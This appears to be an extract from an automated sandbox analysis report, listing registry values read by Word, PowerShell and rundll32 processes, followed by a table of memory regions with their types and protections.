|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Angsana New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
AngsanaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aparajita
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arabic Typesetting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Narrow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Rounded MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Baskerville Old Face
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bauhaus 93
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bell MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bernard MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Blackadder ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Poster Compressed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Book Antiqua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookman Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookshelf Symbol 7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bradley Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Britannic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Broadway
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Browallia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BrowalliaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Brush Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Californian FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calisto MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Candara
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Castellar
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Centaur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Schoolbook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Chiller
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Colonna MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Comic Sans MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Consolas
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Constantia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cooper Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Corbel
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cordia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CordiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Courier New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Curlz MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DaunPenh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
David
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DilleniaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DokChampa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ebrima
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Edwardian Script ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Elephant
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Engravers MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Bold ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Demi ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Light ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Medium ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Estrangelo Edessa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EucrosiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Euphemia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Felix Titling
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Footlight MT Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Forte
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Book
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Heavy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FrankRuehl
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FreesiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Freestyle Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
French Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gabriola
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Garamond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gautami
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Georgia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gigi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Ext Condensed Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gisha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gloucester MT Extra Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Stout
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Haettenschweiler
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harlow Solid Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harrington
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
High Tower Text
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Impact
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Imprint MT Shadow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Informal Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
IrisUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Iskoola Pota
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
JasmineUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Jokerman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Juice ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kalinga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kartika
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Khmer UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KodchiangUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kokila
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kristen ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kunstler Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lao UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Latha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Leelawadee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Levenim MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LilyUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Bright
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Calligraphy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Console
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Fax
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Handwriting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Typewriter
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Unicode
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Magneto
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Maiandra GD
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mangal
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Marlett
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Matura MT Script Capitals
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Himalaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft New Tai Lue
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft PhagsPa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Tai Le
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Uighur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Yi Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mistral
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Modern No. 20
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mongolian Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Monotype Corsiva
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MoolBoran
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Outlook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Specialty
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MT Extra
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MV Boli
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Narkisim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Engraved
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Solid
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Nyala
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
OCR A Extended
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Old English Text MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Onyx
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palace Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palatino Linotype
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Papyrus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Parchment
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua Titling MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Plantagenet Cherokee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Playbill
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Poor Richard
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Pristina
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Raavi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rage Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ravie
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rod
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sakkal Majalla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Script MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Print
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Semibold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shonar Bangla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Showcard Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shruti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Snap ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Stencil
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sylfaen
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tempus Sans ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Times New Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Traditional Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Trebuchet MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tunga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Utsaah
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vani
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Verdana
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vijaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Viner Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vivaldi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vladimir Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vrinda
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Webdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wide Latin
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 3
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F64AC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LastPurgeTime
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
WORDFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F64AC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Settings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ZoomApp
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTF
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\SysWOW64\rundll32.exe
|
SavedLegacySettings
|
There are 326 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2C0000
|
unkown image
|
page execute and read and write
|
||
780000
|
unkown image
|
page execute and read and write
|
||
260000
|
unkown
|
page execute and read and write
|
||
240000
|
unkown
|
page execute and read and write
|
||
3F0000
|
unkown
|
page execute and read and write
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
220000
|
unkown
|
page execute and read and write
|
||
7D0000
|
unkown image
|
page execute and read and write
|
||
710000
|
unkown image
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
2A0000
|
unkown
|
page execute and read and write
|
||
200000
|
unkown
|
page execute and read and write
|
||
3C0000
|
unkown
|
page execute and read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
2B0000
|
unkown
|
page execute and read and write
|
||
760000
|
unkown image
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
230000
|
unkown
|
page execute and read and write
|
||
400000
|
unkown image
|
page execute and read and write
|
||
170000
|
unkown image
|
page execute and read and write
|
||
270000
|
unkown
|
page execute and read and write
|
||
220000
|
unkown
|
page execute and read and write
|
||
260000
|
unkown
|
page execute and read and write
|
||
400000
|
unkown image
|
page execute and read and write
|
||
340000
|
unkown image
|
page execute and read and write
|
||
170000
|
unkown image
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
430000
|
unkown
|
page execute and read and write
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
160000
|
unkown
|
page execute and read and write
|
||
7F3000
|
unkown image
|
page execute and read and write
|
||
140000
|
unkown
|
page read and write
|
||
160000
|
heap private
|
page read and write
|
||
400000
|
unkown image
|
page readonly
|
||
76C000
|
heap default
|
page read and write
|
||
2A00000
|
unkown
|
page readonly
|
||
1B460000
|
unkown
|
page read and write
|
||
3F0000
|
heap private
|
page read and write
|
||
6A4000
|
heap default
|
page read and write
|
||
2E5A000
|
unkown
|
page read and write
|
||
8DD000
|
stack
|
page read and write
|
||
7F1000
|
unkown image
|
page execute and read and write
|
||
160000
|
unkown
|
page readonly
|
||
697000
|
heap default
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
440000
|
heap private
|
page read and write
|
||
32A000
|
unkown image
|
page readonly
|
||
340000
|
unkown image
|
page readonly
|
||
3B0000
|
heap private
|
page read and write
|
||
800000
|
unkown
|
page read and write
|
||
3A46000
|
unkown
|
page read and write
|
||
2A6000
|
unkown
|
page read and write
|
||
346E000
|
unkown
|
page read and write
|
||
7F0000
|
unkown
|
page readonly
|
||
2E34000
|
unkown
|
page read and write
|
||
270000
|
unkown
|
page read and write
|
||
420000
|
heap private
|
page read and write
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
26B0000
|
unkown
|
page readonly
|
||
7A3000
|
unkown image
|
page execute and read and write
|
||
220000
|
heap private
|
page read and write
|
||
1B460000
|
unkown
|
page read and write
|
||
464000
|
unkown image
|
page read and write
|
||
27D0000
|
unkown
|
page readonly
|
||
A80000
|
heap private
|
page read and write
|
||
1DA000
|
unkown image
|
page readonly
|
||
724000
|
heap default
|
page read and write
|
||
1B3AE000
|
unkown
|
page read and write
|
||
2E2E000
|
unkown
|
page read and write
|
||
1C8D0000
|
heap private
|
page read and write
|
||
324000
|
unkown image
|
page read and write
|
||
A80000
|
heap private
|
page read and write
|
||
733000
|
unkown image
|
page execute and read and write
|
||
900000
|
unkown
|
page read and write
|
||
790000
|
heap private
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
8D0000
|
heap private
|
page read and write
|
||
2400000
|
unkown
|
page readonly
|
||
2A8C000
|
unkown
|
page read and write
|
||
191000
|
unkown image
|
page execute and read and write
|
||
1C0000
|
heap private
|
page read and write
|
||
343F000
|
unkown
|
page read and write
|
||
838000
|
unkown image
|
page write copy
|
